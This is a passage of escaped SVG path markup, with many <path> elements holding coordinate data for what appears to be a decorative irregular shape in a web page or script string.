d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n        <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n        <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n        <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n        <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n        <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n        <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n        <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n        <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n        <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n        <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n        <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n        <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n        <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n        <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n        <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n        <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n        <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n        <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n        <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n        <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n        <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n        <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n        <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n        <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n        <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n        <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n        <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n        <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n        <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n        <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n        <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n        <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n        <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n        <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n        <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n        <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n        <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n        <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n        <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n        <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n        <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n        <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n        <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n        <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n        <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n        <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n        <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n        <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n        <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n        <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n        <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n        <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n        <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n        <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n        <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n        <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n        <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n        <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n        <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n        <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n        <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n        <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n        <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n        <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n        <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n        <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n        <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n        <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n        <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n        <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n        <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n        <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n        <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n        <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n        <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n        <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a3